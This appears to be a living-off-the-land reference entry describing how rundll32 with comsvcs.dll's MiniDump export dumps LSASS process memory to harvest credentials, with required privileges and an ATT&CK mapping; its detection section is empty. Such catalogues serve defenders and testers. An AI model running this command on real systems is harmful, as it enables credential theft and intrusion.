.. /Comsvcs.dll
Star

Dump

COM+ Services


Paths:

Resources:
Acknowledgements:

Detection:

Dump

  1. Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.

    rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
    Use case
    Dump Lsass.exe process memory to retrieve credentials.
    Privileges required
    SYSTEM
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1003.001